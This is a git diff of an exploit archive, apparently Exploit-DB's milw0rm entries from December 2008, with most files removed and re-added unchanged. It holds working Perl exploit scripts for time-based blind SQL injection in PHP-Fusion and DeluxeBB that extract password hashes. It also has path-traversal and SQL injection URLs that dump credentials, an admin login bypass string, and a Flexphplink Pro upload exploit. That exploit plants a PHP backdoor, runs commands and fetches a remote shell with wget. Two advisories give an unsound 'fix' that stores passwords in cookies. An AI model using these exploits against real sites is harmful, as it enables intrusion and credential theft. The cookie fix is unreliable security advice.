+# ------------------------------------------------------- +# User Password: my $field = "user_password" ; +# Admin Password: my $field = "user_admin_password"; +# ------------------------------------------------------- + +use strict; +use Digest::MD5('md5_hex'); +use LWP::UserAgent; + + +my $field = "user_password"; +my ($stop,$start,$hash); + + +my $domain = shift; +my $ptable = shift; +my $ulogin = shift; +my $plogin = shift; +my $userid = shift or &usage; + +my @chars = (48..57, 97..102); +my $substr = 1; +my $http = new LWP::UserAgent; + + + +sub send_request +{ + my $post = undef; + my $host = $domain; + my $param = shift @_ or die $!; + + $host .= "/submit.php?stype=l"; + + $http->default_header('Cookie' => "fusion_user=${ulogin}.".md5_hex($plogin)); + $post = $http->post('http://'.$host,[ + 'link_category' => 1, + 'link_name' => 1, + 'link_url' => 1, + 'link_description' => 1, + 'submit_link' => 'Submit+Link', + 'submit_info[pwn]' => $param, + ]); + +} + + +sub give_char +{ + my $send = undef; + my ($charz,$uidz) = @_; + + $send = "' or (select if((ascii(substring". + "($field,$uidz,1))=$charz),". + "benchmark(230000000,char(0)),". + "0) from ${ptable}_users where user_id=$userid))#"; + + return $send; +} + + +for(1..32) +{ + foreach my $set(@chars) + { + my $start = time(); + + send_request(give_char($set,$substr)); + + my $stop = time(); + + if($stop - $start > 6) + { + syswrite(STDOUT,chr($set)); + $substr++; + last; + } + } +} + +sub usage +{ + print "PHP-Fusion <= 7.0.2 Remote Blind SQL Injection Exploit\n"; + print "by athos - staker[at]hotmail[dot]it\n"; + print "Usage: perl $0 [host/path] [table prefix] [id] [password] [target id]\n"; + print "Usage: perl $0 localhost/php-fusion fusion 5 p4ssw0rd 1\n"; + exit; +} + +# milw0rm.com [2008-12-24] diff --git a/platforms/php/webapps/7579.txt b/platforms/php/webapps/7579.txt index 9285121b7..cb8749ac3 100755 --- a/platforms/php/webapps/7579.txt +++ b/platforms/php/webapps/7579.txt 
@@ -1,25 +1,25 @@ -ClaSS -http://www.laex.org/class/ - - -- <=0.8.60 - -magic_quotes_gpc = Off -register_globals = On - - -- File Disclosure/Download - -http://site/Class/class/scripts/export.php?ftype= -/../../path/to/Class/school.php -/../../path/to/Class/dbh_connect.php -/../../etc/passwd - - -- Timeline - -Author notified: Dec 19 -Patch 0.8.61: Dec 19 - - -- Seasons Greetings - -- http://nukeit.org - - -# milw0rm.com [2008-12-24] +ClaSS +http://www.laex.org/class/ + + +- <=0.8.60 - +magic_quotes_gpc = Off +register_globals = On + + +- File Disclosure/Download - +http://site/Class/class/scripts/export.php?ftype= +/../../path/to/Class/school.php +/../../path/to/Class/dbh_connect.php +/../../etc/passwd + + +- Timeline - +Author notified: Dec 19 +Patch 0.8.61: Dec 19 + + +- Seasons Greetings - +- http://nukeit.org - + +# milw0rm.com [2008-12-24] diff --git a/platforms/php/webapps/7580.txt b/platforms/php/webapps/7580.txt index e33ba3e0e..f61cb89df 100755 --- a/platforms/php/webapps/7580.txt +++ b/platforms/php/webapps/7580.txt @@ -1,17 +1,17 @@ -BloofoxCMS 0.3.4 -http://www.bloofox.com/ - -magic_quotes_gpc = Off -register_globals = On - -- File Inclusion - -http://site/bloofoxCMS_0.3.4/plugins/spaw2/dialogs/dialog.php?lang=../../../../../../../../../../../../etc/passwd%00 - -Also vulnerable: -dialog.php?theme= -dialog.php?dialog=foo&module= - -- Seasons Greetings - -- http://nukeit.org - - -# milw0rm.com [2008-12-24] +BloofoxCMS 0.3.4 +http://www.bloofox.com/ + +magic_quotes_gpc = Off +register_globals = On + +- File Inclusion - +http://site/bloofoxCMS_0.3.4/plugins/spaw2/dialogs/dialog.php?lang=../../../../../../../../../../../../etc/passwd%00 + +Also vulnerable: +dialog.php?theme= +dialog.php?dialog=foo&module= + +- Seasons Greetings - +- http://nukeit.org - + +# milw0rm.com [2008-12-24] diff --git a/platforms/php/webapps/7586.txt b/platforms/php/webapps/7586.txt index f5efea65c..7f4814aa3 100755 --- a/platforms/php/webapps/7586.txt 
+++ b/platforms/php/webapps/7586.txt @@ -1,19 +1,19 @@ -############################################################################## -# Miniweb 2.0 Admin bypass -############################################################################## -# Type: -# 'union select 1# -# in the username field and press login, you are admin! -# -# download: http://www.miniweb2.com/ -############################################################################## -# Found by bizzit -# -# Contact: bizzit[at]live.de -############################################################################## -# Greetz to: -# Suicide, ReED, h0yt3r, J0hn^x3r, tmh, n00bor, Five-Three-Nine, electron1x, -# Nazrek, Free-Hack and Sys-Flaw -############################################################################## - -# milw0rm.com [2008-12-28] +############################################################################## +# Miniweb 2.0 Admin bypass +############################################################################## +# Type: +# 'union select 1# +# in the username field and press login, you are admin! +# +# download: http://www.miniweb2.com/ +############################################################################## +# Found by bizzit +# +# Contact: bizzit[at]live.de +############################################################################## +# Greetz to: +# Suicide, ReED, h0yt3r, J0hn^x3r, tmh, n00bor, Five-Three-Nine, electron1x, +# Nazrek, Free-Hack and Sys-Flaw +############################################################################## + +# milw0rm.com [2008-12-28] diff --git a/platforms/php/webapps/7593.pl b/platforms/php/webapps/7593.pl index 0f41d72c5..27c2032ec 100755 --- a/platforms/php/webapps/7593.pl +++ b/platforms/php/webapps/7593.pl 
@@ -1,154 +1,154 @@ -#!/usr/bin/perl -# -------------------------------------------------- -# DeluxeBB <= 1.2 Remote Blind SQL Injection Exploit -# -------------------------------------------------- -# by athos - staker[at]hotmail[dot]it -# download on http://deluxebb.com -# -------------------------------------------------- -# Usage: -# perl xpl.pl host/path prefix id password target id -# perl xpl.pl localhost/deluxebb deluxebb 5 r00x 1 -# -------------------------------------------------- -# Note: magic_quotes_gpc off -# don't add me on msn messenger -# my email staker.38@gmail.com -# -------------------------------------------------- -# Greetz: str0ke,The:Paradox and #cancer -# -------------------------------------------------- - -use strict; -use Digest::MD5('md5_hex'); -use LWP::UserAgent; - -my ($hash,$http); -my ($host,$prefix,$user,$pass,$target) = @ARGV; - -$http = new LWP::UserAgent(timeout => 5); - -if (@ARGV != 5) -{ - print "\n+----------------------------------------------------+\r", - "\n| DeluxeBB <= 1.2 Remote Blind SQL Injection Exploit |\r", - "\n+----------------------------------------------------+\r", - "\nby athos - staker[at]hotmail[dot]it\n", - "\nUsage + perl $0 [host/path] [prefix] [ID] [password] [target ID]", - "\nHost + localhost/DeluxeBB", - "\nID + your user ID", - "\nPassword + your password", - "\nPrefix + table prefix (default: deluxebb)", - "\nTarget ID + target id\n"; - exit; -} - -$http->default_header('Cookie' => cookies($user,$pass)); - -&exploit; - -sub getUsername -{ - my ($user_id,$response,@nickname) = $_[0]; - - $response = $http->get("http://$host/misc.php?sub=profile&uid=$user_id"); - @nickname = $response->as_string =~ m{(.+?)}ig; - - return $nickname[1]; -} - - - -sub cookies -{ - my ($username); - my ($user_id,$password) = @_; - - $username = getUsername($user_id); - $password = md5_hex($password); - - return qq{membercookie=$username; memberid=$user_id; memberpw=$password;}; -} - - -sub getMsg -{ - my $response = 
$http->get("http://$host/pm.php?sub=folder&name=inbox"); - - if ($response->as_string =~ m/pid=(\d+)./i) - { - return $1; - } - else - { - my $content = { - to => getUsername($user), - subject => rand(999), - posticon => 'none', - rte1 => rand(999), - submit => 'Send' - - }; - - - my $request = $http->post("http://$host/pm.php?sub=newpm",$content); - my $read_id = $http->get("http://$host/pm.php?sub=folder&name=inbox"); - - if ($read_id->content =~ /pid=(\d+)./i) - { - return $1; - } - } -} - - -sub sql -{ - my ($i,$j,$sql) = (shift,shift,undef); - - $sql = "%27+OR+(SELECT+IF((ASCII(SUBSTRING(pass,$i,1))=$j),". - "benchmark(200000000,CHAR(0)),0)+FROM+${prefix}_users". - "+WHERE uid=$target))%23"; - - return $sql; -} - - -sub delay -{ - my ($tm1,$tm2) = (undef,undef); - my ($msg,$sql) = @_; - - $tm1 = time(); - - $http->get("http://$host/pm.php?sub=do&submit=Delete&delete$msg=$sql"); - - $tm2 = time(); - - return $tm2 - $tm1; -} - - -sub exploit -{ - my ($i,$ord) = (1,undef); - my @chr = (48..57, 97..102); - - for ($i..32) - { - foreach $ord(@chr) - { - if (delay(&getMsg,&sql($i,$ord)) >= 5) - { - syswrite(STDOUT,chr($ord)); $hash .= chr($ord); - last; - $i++; - } - - if ($i == 2 and not defined $hash) - { - syswrite(STDOUT,"Exploit Failed!\n"); - exit; - } - } - } -} - -# milw0rm.com [2008-12-28] +#!/usr/bin/perl +# -------------------------------------------------- +# DeluxeBB <= 1.2 Remote Blind SQL Injection Exploit +# -------------------------------------------------- +# by athos - staker[at]hotmail[dot]it +# download on http://deluxebb.com +# -------------------------------------------------- +# Usage: +# perl xpl.pl host/path prefix id password target id +# perl xpl.pl localhost/deluxebb deluxebb 5 r00x 1 +# -------------------------------------------------- +# Note: magic_quotes_gpc off +# don't add me on msn messenger +# my email staker.38@gmail.com +# -------------------------------------------------- +# Greetz: str0ke,The:Paradox and #cancer +# 
-------------------------------------------------- + +use strict; +use Digest::MD5('md5_hex'); +use LWP::UserAgent; + +my ($hash,$http); +my ($host,$prefix,$user,$pass,$target) = @ARGV; + +$http = new LWP::UserAgent(timeout => 5); + +if (@ARGV != 5) +{ + print "\n+----------------------------------------------------+\r", + "\n| DeluxeBB <= 1.2 Remote Blind SQL Injection Exploit |\r", + "\n+----------------------------------------------------+\r", + "\nby athos - staker[at]hotmail[dot]it\n", + "\nUsage + perl $0 [host/path] [prefix] [ID] [password] [target ID]", + "\nHost + localhost/DeluxeBB", + "\nID + your user ID", + "\nPassword + your password", + "\nPrefix + table prefix (default: deluxebb)", + "\nTarget ID + target id\n"; + exit; +} + +$http->default_header('Cookie' => cookies($user,$pass)); + +&exploit; + +sub getUsername +{ + my ($user_id,$response,@nickname) = $_[0]; + + $response = $http->get("http://$host/misc.php?sub=profile&uid=$user_id"); + @nickname = $response->as_string =~ m{(.+?)}ig; + + return $nickname[1]; +} + + + +sub cookies +{ + my ($username); + my ($user_id,$password) = @_; + + $username = getUsername($user_id); + $password = md5_hex($password); + + return qq{membercookie=$username; memberid=$user_id; memberpw=$password;}; +} + + +sub getMsg +{ + my $response = $http->get("http://$host/pm.php?sub=folder&name=inbox"); + + if ($response->as_string =~ m/pid=(\d+)./i) + { + return $1; + } + else + { + my $content = { + to => getUsername($user), + subject => rand(999), + posticon => 'none', + rte1 => rand(999), + submit => 'Send' + + }; + + + my $request = $http->post("http://$host/pm.php?sub=newpm",$content); + my $read_id = $http->get("http://$host/pm.php?sub=folder&name=inbox"); + + if ($read_id->content =~ /pid=(\d+)./i) + { + return $1; + } + } +} + + +sub sql +{ + my ($i,$j,$sql) = (shift,shift,undef); + + $sql = "%27+OR+(SELECT+IF((ASCII(SUBSTRING(pass,$i,1))=$j),". + "benchmark(200000000,CHAR(0)),0)+FROM+${prefix}_users". 
+ "+WHERE uid=$target))%23"; + + return $sql; +} + + +sub delay +{ + my ($tm1,$tm2) = (undef,undef); + my ($msg,$sql) = @_; + + $tm1 = time(); + + $http->get("http://$host/pm.php?sub=do&submit=Delete&delete$msg=$sql"); + + $tm2 = time(); + + return $tm2 - $tm1; +} + + +sub exploit +{ + my ($i,$ord) = (1,undef); + my @chr = (48..57, 97..102); + + for ($i..32) + { + foreach $ord(@chr) + { + if (delay(&getMsg,&sql($i,$ord)) >= 5) + { + syswrite(STDOUT,chr($ord)); $hash .= chr($ord); + last; + $i++; + } + + if ($i == 2 and not defined $hash) + { + syswrite(STDOUT,"Exploit Failed!\n"); + exit; + } + } + } +} + +# milw0rm.com [2008-12-28] diff --git a/platforms/php/webapps/7595.txt b/platforms/php/webapps/7595.txt index 872ba61bb..541cc7b5a 100755 --- a/platforms/php/webapps/7595.txt +++ b/platforms/php/webapps/7595.txt @@ -1,19 +1,19 @@ - - in the name of god - - ..:: jj_nanak2000@yahoo.com ::.. - - - Tanx from : Expl0its - - - -Script : FubarForum - -Version : 1.6 - -Dork : "Powered by FubarForum v1.6" - -/forum/index.php?page=admin - -# milw0rm.com [2008-12-28] + + in the name of god + + ..:: jj_nanak2000@yahoo.com ::.. + + + Tanx from : Expl0its + + + +Script : FubarForum + +Version : 1.6 + +Dork : "Powered by FubarForum v1.6" + +/forum/index.php?page=admin + +# milw0rm.com [2008-12-28] diff --git a/platforms/php/webapps/7596.txt b/platforms/php/webapps/7596.txt index 3370b4674..ee493333b 100755 --- a/platforms/php/webapps/7596.txt +++ b/platforms/php/webapps/7596.txt 
@@ -1,26 +1,25 @@ - ---AlstraSoft Web Email Script Enterprise (id) Remote SQL Injection Vuln. -############################################ -Yazar(Auth0r): Bgh7 - -Site: Http://ozelteam.com Turk Bılısım Guclerı - -PsT: ByBgh7 [at] msn [d0t] c0m -############################################ - ---Script: http://www.alstrasoft.com/disposable-email-script.htm - ---Dork: AlstraSoft Web "ESE" - ---Dork2: AlstraSoft Web Email Script Enterprise - ---Expl0it; ---http://web.xxx /Script/ index.php?Act=directory&joinstatus=awesewise&id=-1+union+select+1,2,3,concat_ws(0x3a,admin_login,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45+from+partners_admin - -######### -column_name -İd -Passwd -######### - -# milw0rm.com [2008-12-28] +--AlstraSoft Web Email Script Enterprise (id) Remote SQL Injection Vuln. +############################################ +Yazar(Auth0r): Bgh7 + +Site: Http://ozelteam.com Turk Bılısım Guclerı + +PsT: ByBgh7 [at] msn [d0t] c0m +############################################ + +--Script: http://www.alstrasoft.com/disposable-email-script.htm + +--Dork: AlstraSoft Web "ESE" + +--Dork2: AlstraSoft Web Email Script Enterprise + +--Expl0it; +--http://web.xxx /Script/ index.php?Act=directory&joinstatus=awesewise&id=-1+union+select+1,2,3,concat_ws(0x3a,admin_login,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45+from+partners_admin + +######### +column_name +İd +Passwd +######### + +# milw0rm.com [2008-12-28] diff --git a/platforms/php/webapps/7597.txt b/platforms/php/webapps/7597.txt index 82d4511ee..b7148f6b7 100755 --- a/platforms/php/webapps/7597.txt +++ b/platforms/php/webapps/7597.txt 
@@ -1,48 +1,48 @@ -[START] - -#################################################################################################################### -[0x01] Informations: - -Script : OwenPoll 1.0 -Download : http://www.hotscripts.com/jump.php?listing_id=75178&jump_type=1 -Vulnerability : Insecure Cookie Handling -Author : Osirys -Contact : osirys[at]live[dot]it -Website : http://osirys.org -Notes : Proud to be Italian -Greets: : x0r, emgent, Jay, str0ke, Todd and AlpHaNiX - - -#################################################################################################################### -[0x02] Bug: [Insecure Cookie Handling] -###### - -Bugged file is: /[path]/checkloginmini.php - -[CODE] - - if (($loggedinname == $adminusername) AND ($loggedinpass == $adminpass)){ - // authentication was successful - // create session and set cookie with username - session_start(); - $_SESSION['auth'] = 1; - - setcookie("username", $_POST['txtusername'], time()+(86400*30)); - -[/CODE] - -If we log in correctly, a cookie is set with name "username" and as content the username name. - -[!] FIX: Set as content username's password. - -[CODE] setcookie("username", $_POST['txtpassword'], time()+(86400*30)); [/CODE] - - -[!] 
EXPLOIT: javascript:document.cookie = "username=admin_username; path=/"; - *admin_username is the nick of the administrator - -#################################################################################################################### - -[/END] - -# milw0rm.com [2008-12-28] +[START] + +#################################################################################################################### +[0x01] Informations: + +Script : OwenPoll 1.0 +Download : http://www.hotscripts.com/jump.php?listing_id=75178&jump_type=1 +Vulnerability : Insecure Cookie Handling +Author : Osirys +Contact : osirys[at]live[dot]it +Website : http://osirys.org +Notes : Proud to be Italian +Greets: : x0r, emgent, Jay, str0ke, Todd and AlpHaNiX + + +#################################################################################################################### +[0x02] Bug: [Insecure Cookie Handling] +###### + +Bugged file is: /[path]/checkloginmini.php + +[CODE] + + if (($loggedinname == $adminusername) AND ($loggedinpass == $adminpass)){ + // authentication was successful + // create session and set cookie with username + session_start(); + $_SESSION['auth'] = 1; + + setcookie("username", $_POST['txtusername'], time()+(86400*30)); + +[/CODE] + +If we log in correctly, a cookie is set with name "username" and as content the username name. + +[!] FIX: Set as content username's password. + +[CODE] setcookie("username", $_POST['txtpassword'], time()+(86400*30)); [/CODE] + + +[!] EXPLOIT: javascript:document.cookie = "username=admin_username; path=/"; + *admin_username is the nick of the administrator + +#################################################################################################################### + +[/END] + +# milw0rm.com [2008-12-28] diff --git a/platforms/php/webapps/7598.txt b/platforms/php/webapps/7598.txt index e2e44f5e4..56f57e3ee 100755 --- a/platforms/php/webapps/7598.txt +++ b/platforms/php/webapps/7598.txt 
@@ -1,22 +1,22 @@ -##################################################################################### -#### PHP-Fusion Mod TI - Blog System Sql Injection #### -##################################################################################### -# # -#AUTHOR : Sina Yazdanmehr (R3d.W0rm) # -#Discovered by : Sina Yazdanmehr (R3d.W0rm) # -#Our Site : Http://IRCRASH.COM # -#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi -##################################################################################### -# # -#Download : http://www.phpfusion-mods.net/infusions/downloads/dldb.php?op=view&id=157 -# # -##################################################################################### -# [Bug] # -# # -#http://Site/[path]/blog.php?page=blog_id&id=-9999'+union+select+0,1,2,user_name,user_password,5+from+fusion_users/* -# # -##################################################################################### -# Site : Http://IRCRASH.COM # -###################################### TNX GOD ###################################### - -# milw0rm.com [2008-12-28] +##################################################################################### +#### PHP-Fusion Mod TI - Blog System Sql Injection #### +##################################################################################### +# # +#AUTHOR : Sina Yazdanmehr (R3d.W0rm) # +#Discovered by : Sina Yazdanmehr (R3d.W0rm) # +#Our Site : Http://IRCRASH.COM # +#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi +##################################################################################### +# # +#Download : http://www.phpfusion-mods.net/infusions/downloads/dldb.php?op=view&id=157 +# # +##################################################################################### +# [Bug] # +# # +#http://Site/[path]/blog.php?page=blog_id&id=-9999'+union+select+0,1,2,user_name,user_password,5+from+fusion_users/* +# # 
+##################################################################################### +# Site : Http://IRCRASH.COM # +###################################### TNX GOD ###################################### + +# milw0rm.com [2008-12-28] diff --git a/platforms/php/webapps/7600.pl b/platforms/php/webapps/7600.pl index d5376c517..4a73969b7 100755 --- a/platforms/php/webapps/7600.pl +++ b/platforms/php/webapps/7600.pl @@ -1,215 +1,215 @@ -#!/usr/bin/perl - -# HAPPY CHRISTMAS !! -# Flexphplink Pro -# http://www.hotscripts.com/jump.php?listing_id=21062&jump_type=1 -# Bug: Arbitrary File Upload -# * I coded this exploit just for fun ;) -# Exploit coded by Osirys -# osirys[at]live[dot]it -# http://osirys.org -# Greets: x0r, miclen, emgent, str0ke, Todd and AlpHaNiX - -# Example: -# osirys[~]>$ perl exp.txt http://localhost/flexphplinkproen/ -# ============================ -# Flexphplink Pro Exploit -# Coded by Osirys -# osirys[at]live[dot]it -# Proud to be italian -# ============================ -# [+] http://localhost/flexphplinkproen/ backdoored, just type your choise: -# 1 - Admin Details Disclosure -# 2 - Arbitrary Command Execution -# 3 - Shell upload -# 4 - Exit -# 1 -# [+] Extracting Admin Login Details . -# [+] Done: -# Username: admin -# Password: adminz -# osirys[~]>$ - - -use HTTP::Request; -use LWP::UserAgent; - - -my $path = "/submitlink.php"; -my $u_path = "/linkphoto/"; -my $l_file = "back.php"; - -my $code = "RCE backdoor


    \";if(!empty(\$_GET['cmd'])&&empty". - "(\$_GET['adm'])){echo\"CMD: \";system(\$_GET['cmd']);}elseif((\$_GET". - "['adm']==\"get\")&&empty(\$_GET['cmd'])){if(is_file(\"../const.inc.php3\" )". - "){include('../const.inc.php3');}elseif(is_file(\"../const.inc.php\")){ incl". - "ude ('../const.inc.php');}echo \"Username: \$admin_username\"; echo". - "\"
    \"; echo \"Password: \$admin_password\"; } ?>"; - -my $host = $ARGV[0]; - -($host) || help("-1"); -cheek($host) == 1 || help("-2"); -&banner; - -open ($file, ">", $l_file); -print $file "$code\n"; -close ($file); - -$dir = `pwd`; -my $f_path = $dir."/".$l_file; -$f_path =~ s/\n//; - -my $url = $host.$path; -my $ua = LWP::UserAgent->new; -$time = time(); -my $post = $ua->post($url, - Content_Type => 'form-data', - Content => [ - title => 'abco', - url => 'def', - userfile => [$f_path, '.php'], - addlink => 'Add' - ] - ); - -if (($post->is_success)&&($post->as_string=~ /Thank you for your submission/)) { - `rm -rf $f_path`; - cheek_fname($time); - ($rcefile) || die "[-] Unable to find phpscript uploaded\n"; - &go; -} -else { - print "[-] Unable to upload evil php-code !\n"; - exit(0); -} - -sub go() { - my $error = $_[0]; - if ($error == -1) { - print "[-] Bad Choice\n\n"; - } - elsif ($error == -2) { - print "[-] Bad shell url\n\n"; - } - print "[+] $host backdoored, just type your choise:\n". - " 1 - Admin Details Disclosure\n". - " 2 - Arbitrary Command Execution\n". - " 3 - Shell upload\n". - " 4 - Exit\n"; - - $choice = ; - $choice =~ /1|2|3|4/ || go("-1"); - if ($choice == 1) { - &adm_disc; - } - elsif ($choice == 2) { - &exec_cmd; - } - elsif ($choice == 3) { - &shell_up; - } - elsif ($choice == 4) { - print "[-] Quitting ..\n"; - exit(0); - } -} - -sub adm_disc { - print "[+] Extracting Admin Login Details ..\n"; - $exec_url = ($host.$u_path.$time.".php?adm=get"); - $re = query($exec_url); - if ($re =~ /Username: <\/b>(.*)
    Password: <\/b>(.*)/) { - my($user,$pass) = ($1,$2); - print "[+] Done: \n". - " Username: $user\n". - " Password: $pass\n"; - } - else { - print "[-] Can't extract Admin Details.\n\n"; - &go; - } -} - -sub exec_cmd { - print "shell\$>\n"; - $cmd = ; - $cmd !~ /exit/ || die "[-] Quitting ..\n"; - $exec_url = ($host.$u_path.$time.".php?cmd=".$cmd); - $re = query($exec_url); - if ($re =~ /CMD: <\/b>(.*)/) { - print "[*] $1\n"; - &exec_cmd; - } - else { - print "[-] Undefined output or bad cmd !\n"; - &exec_cmd; - } -} - -sub shell_up { - print "[+] Type now a link for your .txt shell\n". - " Shell name must be with .txt extension\n"; - $s_link = ; - $s_link =~ /.*\/(.*)\.txt/ || &go("-2"); - $s_name = $1; - $exec_url = ($host.$u_path.$time.".php?cmd=wget ".$s_link); - $exec_url2 = ($host.$u_path.$time.".php?cmd=mv ".$s_name.".txt ".$s_name.".php"); - query($exec_url); query($exec_url2); - print "[+] Your shell should be here: ".$host.$u_path.$s_name.".php\n"; -} - -sub cheek_fname() { - my $time = $_[0]; - my $name = $time.".php"; - $re = query($host.$u_path.$name); - if ($re =~ /RCE backdoor<\/b>/) { - $rcefile = $name; - return; - } -} - -sub query() { - $link = $_[0]; - my $req = HTTP::Request->new(GET => $link); - my $ua = LWP::UserAgent->new(); - $ua->timeout(4); - my $response = $ua->request($req); - return $response->content; -} - -sub cheek() { - my $host = $_[0]; - if ($host =~ /http:\/\/(.*)/) { - return 1; - } - else { - return 0; - } -} - -sub banner { - print "\n". - " ============================ \n". - " Flexphplink Pro Exploit \n". - " Coded by Osirys \n". - " osirys[at]live[dot]it \n". - " Proud to be italian \n". 
- " ============================ \n\n"; -} - -sub help() { - my $error = $_[0]; - if ($error == -1) { - &banner; - print "\n[-] Cheek that you provide a hostname address!\n"; - } - elsif ($error == -2) { - &banner; - print "\n[-] Bad hostname address !\n"; - } - print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; - exit(0); -} - -# milw0rm.com [2008-12-28] +#!/usr/bin/perl + +# HAPPY CHRISTMAS !! +# Flexphplink Pro +# http://www.hotscripts.com/jump.php?listing_id=21062&jump_type=1 +# Bug: Arbitrary File Upload +# * I coded this exploit just for fun ;) +# Exploit coded by Osirys +# osirys[at]live[dot]it +# http://osirys.org +# Greets: x0r, miclen, emgent, str0ke, Todd and AlpHaNiX + +# Example: +# osirys[~]>$ perl exp.txt http://localhost/flexphplinkproen/ +# ============================ +# Flexphplink Pro Exploit +# Coded by Osirys +# osirys[at]live[dot]it +# Proud to be italian +# ============================ +# [+] http://localhost/flexphplinkproen/ backdoored, just type your choise: +# 1 - Admin Details Disclosure +# 2 - Arbitrary Command Execution +# 3 - Shell upload +# 4 - Exit +# 1 +# [+] Extracting Admin Login Details . +# [+] Done: +# Username: admin +# Password: adminz +# osirys[~]>$ + + +use HTTP::Request; +use LWP::UserAgent; + + +my $path = "/submitlink.php"; +my $u_path = "/linkphoto/"; +my $l_file = "back.php"; + +my $code = "RCE backdoor

    \";if(!empty(\$_GET['cmd'])&&empty". + "(\$_GET['adm'])){echo\"CMD: \";system(\$_GET['cmd']);}elseif((\$_GET". + "['adm']==\"get\")&&empty(\$_GET['cmd'])){if(is_file(\"../const.inc.php3\" )". + "){include('../const.inc.php3');}elseif(is_file(\"../const.inc.php\")){ incl". + "ude ('../const.inc.php');}echo \"Username: \$admin_username\"; echo". + "\"
    \"; echo \"Password: \$admin_password\"; } ?>"; + +my $host = $ARGV[0]; + +($host) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +open ($file, ">", $l_file); +print $file "$code\n"; +close ($file); + +$dir = `pwd`; +my $f_path = $dir."/".$l_file; +$f_path =~ s/\n//; + +my $url = $host.$path; +my $ua = LWP::UserAgent->new; +$time = time(); +my $post = $ua->post($url, + Content_Type => 'form-data', + Content => [ + title => 'abco', + url => 'def', + userfile => [$f_path, '.php'], + addlink => 'Add' + ] + ); + +if (($post->is_success)&&($post->as_string=~ /Thank you for your submission/)) { + `rm -rf $f_path`; + cheek_fname($time); + ($rcefile) || die "[-] Unable to find phpscript uploaded\n"; + &go; +} +else { + print "[-] Unable to upload evil php-code !\n"; + exit(0); +} + +sub go() { + my $error = $_[0]; + if ($error == -1) { + print "[-] Bad Choice\n\n"; + } + elsif ($error == -2) { + print "[-] Bad shell url\n\n"; + } + print "[+] $host backdoored, just type your choise:\n". + " 1 - Admin Details Disclosure\n". + " 2 - Arbitrary Command Execution\n". + " 3 - Shell upload\n". + " 4 - Exit\n"; + + $choice = ; + $choice =~ /1|2|3|4/ || go("-1"); + if ($choice == 1) { + &adm_disc; + } + elsif ($choice == 2) { + &exec_cmd; + } + elsif ($choice == 3) { + &shell_up; + } + elsif ($choice == 4) { + print "[-] Quitting ..\n"; + exit(0); + } +} + +sub adm_disc { + print "[+] Extracting Admin Login Details ..\n"; + $exec_url = ($host.$u_path.$time.".php?adm=get"); + $re = query($exec_url); + if ($re =~ /Username: <\/b>(.*)
    Password: <\/b>(.*)/) { + my($user,$pass) = ($1,$2); + print "[+] Done: \n". + " Username: $user\n". + " Password: $pass\n"; + } + else { + print "[-] Can't extract Admin Details.\n\n"; + &go; + } +} + +sub exec_cmd { + print "shell\$>\n"; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + $exec_url = ($host.$u_path.$time.".php?cmd=".$cmd); + $re = query($exec_url); + if ($re =~ /CMD: <\/b>(.*)/) { + print "[*] $1\n"; + &exec_cmd; + } + else { + print "[-] Undefined output or bad cmd !\n"; + &exec_cmd; + } +} + +sub shell_up { + print "[+] Type now a link for your .txt shell\n". + " Shell name must be with .txt extension\n"; + $s_link = ; + $s_link =~ /.*\/(.*)\.txt/ || &go("-2"); + $s_name = $1; + $exec_url = ($host.$u_path.$time.".php?cmd=wget ".$s_link); + $exec_url2 = ($host.$u_path.$time.".php?cmd=mv ".$s_name.".txt ".$s_name.".php"); + query($exec_url); query($exec_url2); + print "[+] Your shell should be here: ".$host.$u_path.$s_name.".php\n"; +} + +sub cheek_fname() { + my $time = $_[0]; + my $name = $time.".php"; + $re = query($host.$u_path.$name); + if ($re =~ /RCE backdoor<\/b>/) { + $rcefile = $name; + return; + } +} + +sub query() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub banner { + print "\n". + " ============================ \n". + " Flexphplink Pro Exploit \n". + " Coded by Osirys \n". + " osirys[at]live[dot]it \n". + " Proud to be italian \n". 
+ " ============================ \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Cheek that you provide a hostname address!\n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +# milw0rm.com [2008-12-28] diff --git a/platforms/php/webapps/7601.txt b/platforms/php/webapps/7601.txt index 897b2d01f..4503afbbc 100755 --- a/platforms/php/webapps/7601.txt +++ b/platforms/php/webapps/7601.txt 
@@ -1,46 +1,46 @@ -[START] - -#################################################################################################################### -[0x01] Informations: - -Script : Silentum LoginSys 1.0.0 -Download : http://www.hotscripts.com/jump.php?listing_id=69667&jump_type=1 -Vulnerability : Insecure Cookie Handling -Author : Osirys -Contact : osirys[at]live[dot]it -Website : http://osirys.org -Notes : Proud to be Italian -Greets: : x0r, emgent, Jay, str0ke, Todd and AlpHaNiX - - -#################################################################################################################### -[0x02] Bug: [Insecure Cookie Handling] -###### - -Bugged file is: /[path]/login2.php - -[CODE] - - else { - setcookie("logged_in", $login_user_name, time()+60*60*24*$logged_in_for, "/"); - header("Location: index.php"); - exit; - } - -[/CODE] - -If we log in correctly, a cookie is set with name "logged_in" and as content the username name. - -[!] FIX: Set as content username's password. - -[CODE] setcookie("logged_in", $login_password, time()+60*60*24*$logged_in_for, "/"); [/CODE] - - -[!] 
